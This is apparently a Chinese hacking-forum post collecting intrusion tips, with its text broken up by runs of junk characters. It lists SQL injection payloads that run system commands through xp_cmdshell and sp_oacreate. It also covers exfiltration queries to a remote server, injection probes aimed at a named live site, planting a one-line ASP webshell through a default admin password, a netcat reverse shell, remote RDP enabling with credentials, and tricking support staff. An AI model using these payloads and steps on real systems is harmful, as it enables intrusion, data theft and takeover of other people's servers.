SA点数据库分离技术相关! ]+ B' `& o' h, f8 X/ i v) ?
& _. k* U, f T- o/ K8 m) j
$ @/ q6 D3 D# o! G- j& ? tSA点数据库分离搞法+语句:6 ?0 c3 t+ S B% M/ d1 [
1 }" d0 j: W' L! J( _
注射点不显错,执行下面三条语句页面都返回正常。6 V# T5 l9 l. u& G6 E1 Q: j
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
$ r7 I5 G, V+ Fand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')8 a) t! m$ i8 w: k6 A3 p
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')' c+ B5 [# |* o3 b! M$ L, a" o* Z5 }
可以列目录,判断系统为2000,web与数据库分离
- f7 W( ~' I. N1 L) ~7 j6 [遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
0 t; A* p! R- S: n6 p8 h) l- V在注射点上执行- g9 s8 [3 g" w- P
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--5 V! j2 B5 a: s S% D& j& K
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP+ g/ f q* g0 m* o
还有我用NC监听得其他端口都没有得到IP。% v7 k+ X% ]' v; e) @2 U+ V4 m
o! Y- J' N# X0 P
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
7 K/ D* ~9 v$ I6 b8 {'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
7 ?1 }8 L# v. u3 t" q
+ ?" ]% E' F$ p1 p$ D! r;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
$ j% M1 H% Y# J# u. v# h* `" a1 s# |' O1 j2 L
现在就猜想是不是数据库是内网而且不能连外网。 s! A. A, M+ h3 R% U R
* ]6 z% z+ v9 K0 d3 F! t# E8 K9 n
3 `; W" h6 W' L$ l' o) `
access导出txt文本代码
' o. M+ L) S+ `# T. N# n) NSELECT * into [test.txt] in 'd:\web\' 'text;' from admin4 |! Q' |% J( ^) X/ Q
! d9 c4 ?. |2 h0 B; S' r/ D/ f
* K# \0 ~, u% c! M
/ w. }7 a6 p' L; q) J, F5 o; f
自动跳转到指定网站代码头- {3 b# z5 e2 o7 \) g& e
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>/ d9 z0 ^/ ~6 r# U6 I6 D( l& A' o9 Y0 }
D9 G8 z+ t! d: C
/ ?: X& x+ }, f8 x" |4 w" {7 k入侵java or jsp站点时默认配置文件路径:! U) P' J! v& J4 ^+ @. P: ?
\web-inf\web.xml
+ ^9 L4 ^6 y& _tomcat下的配置文件位置:
# U$ R+ l8 L8 @0 G" c7 C3 Q\conf\server.xml (前面加上tomcat路径)' @9 W' a0 _: z
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml( N0 L* J1 |+ A; I: ^
+ @* Z2 V9 g+ T6 a% E2 n/ f3 B! d* l
% R( X& k8 L5 z
6 D/ [* N$ ]9 h! i检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:: S. }" h, a9 a. J
-1%234 u: `- b, m: X0 K4 \
>
% N1 I) ^/ v! H6 a: K<& R8 [4 `+ q; d. H
1'+or+'1'='13 p& s+ H j3 B5 ^( {: _- z# P
id=8%bf
8 t! e" R( o4 D4 l6 W+ y( g1 A% z6 w4 {/ K% V
全新注入点检测试法:# L6 F" Q2 G; X8 q5 u" k0 t
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。 I0 f5 n" P0 D0 Q% _6 a
/ G1 A8 d1 g9 p" A8 p* |4 Z在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。' v1 }* w& E% L1 ^) M! e' x
' J+ @$ Q8 \: O0 A5 L搜索型注入判断方法:% ^4 e& Y0 h% `: D! W
北京%' and '1'='1' and '%'='
+ S9 `- E2 b# N( f5 p/ z, J- Y北京%' and '1'='2' and '%'='5 m! m7 {- `+ U$ ^% a- m! U
" p' `! ]2 e3 U8 L$ o# _% m* x
2 P0 ?. D" y& z8 xCOOKIES注入:& n1 ^* z0 b1 M" `) n% r$ e; }2 }4 c( j
C9 o# r! }+ v. pjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
/ V4 ~* K7 U4 j E% q+ S2 s+ I. v" G) g+ S3 a$ l4 @# n
2000专业版查看本地登录用户命令:
1 X5 t' I# I# r0 M Q" Pnet config workstation
9 @" D1 v. ?* e; N2 P& r; T3 `+ I3 M9 @* W0 ^3 h5 I
% U6 B7 e. e$ \+ R! J0 C4 G5 e2003下查看ipsec配置和默认防火墙配置命令:" P h9 d& ~1 `
netsh firewall show config
8 U2 x u+ B4 X V* Ynetsh ipsec static show all* ^4 }9 Z) M H( A
6 J6 I& `! a4 c' h5 B# C
不指派指定策略命令:
2 J: o( [& T' G& k6 ]3 e. J& ` ^netsh ipsec static set policy name=test assign=n (test是不指派的策略名)
5 R# [3 L7 L" G, X, |- `3 i1 s1 znetsh ipsec static show policy all 显示策略名
% f0 J0 ^7 Z8 V6 _: T% `4 ?1 \* N; `2 g9 L4 a/ k
* a' \; b/ p2 V# `' t/ G. t9 E+ V3 D
猜管理员后台小技巧:9 r D6 W1 j* }1 U. L
admin/left.asp " ^( ^% M }- a
admin/main.asp
1 g( }% ]2 K" \; T# hadmin/top.asp4 X, f) p$ q6 D6 a0 S- u+ D
admin/admin.asp
6 n0 y6 a5 F3 D. f会现出菜单导航,然后迅雷下载全部链接
7 o- n7 t) G) B" z" P! m, R, T9 ]. c
2 V) q7 E4 B% P+ r2 |5 H& `/ r, I社会工程学:
# C! E# n% S. Y |用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人* H2 v# \- S) ]$ V
然后去骗客服2 a6 A/ U1 M8 n! N1 C/ P0 A) |
8 d5 x; K6 K0 Q( ^
9 C/ \" f0 t& @
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: # h: w% Y5 t# i. X( ]
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
9 ]; ]9 ~, {% A8 \# R5 V 存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
$ M# r7 v9 `! C- D+ f
/ V2 d& n; G0 E* Z/ s% d# Q0 d6 T/ q! u3 N9 y7 _
& |8 _! b! |/ Z) y! ~- v& c6 J
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)9 V* E) Y: i. W3 \0 [* n+ e
# A. H: s6 r5 |/ Y
) Z* u( }+ Z- F9 t9 ~6 p- t- }& x2 _' ?" }2 J' X
CMD加密注册表位置
]4 k6 k' t5 j# e: }$ h( h(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor* t8 P# U9 c( h5 P1 Y7 R2 z
AutoRun
6 v3 F. \& n2 e7 q
8 h8 |$ d2 K L! M9 q* M(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
7 o% ^8 [0 L4 w: O5 V& `AutoRun
4 r! t4 Q" V$ l. h+ g% `4 J! q5 S5 d0 w8 D
& t* K; v2 K) I+ d I
在找注入时搜索Hidden,把他改成test& A' x: K$ I) a9 r- ?4 c3 q. _+ ?
( P0 ~+ B2 S$ d9 W% R" U4 v! P3 @4 c1 G! U$ y) T
' |7 a( e- ~- b/ n8 K% @% E
mstsc /v:IP /console
/ j G* o# s/ x" t' H7 y1 e, i3 ]5 \
6 c' l( Y5 @; m0 B! e$ _一句话开3389:
" Y. A% ]/ M# h( L5 Z
* q" `0 \+ d1 H7 i" V* |6 e5 t最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> . s# j( e P5 e! M7 M) @
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.1 i! D1 z4 C3 O; }
c; V7 z) s4 ^) W: m3 ^
9 H8 w' S' j: m L2 _# \知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
. v9 a; v1 D7 `5 eInsert into admin(user,pwd) values('test','test')# V1 O% d. ?3 \2 V& j3 m* ~
8 A$ ~7 i$ i7 c# Y8 O& A6 ]1 _
NC反弹
% O5 {% q/ U$ t) j; w先在本机执行: nc -vv -lp 监听的端口 (自己执行) 4 B$ o" u% Q# K: t% ~1 ^
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)3 i2 W# e' c& e- ~2 K; g- B
: X# \% L' v6 u$ y3 d4 K7 A
2 `! V) A% w2 M/ L4 n
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题4 d+ a( i& l( p+ q, L; g4 ~
$ x, Q5 [: A7 w
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录( P# K# S( i! N
例如:
+ X+ w3 k! ~1 V, J7 M" usubst k: d:\www\ 用d盘www目录替代k盘
) q) x3 c4 H4 ^$ U; V* g& M- \subst k: /d 解除K盘代替 |
匿名
发表于 2017-12-20 02:36:51
发表于 2012-9-15 14:41:29
收藏
支持
反对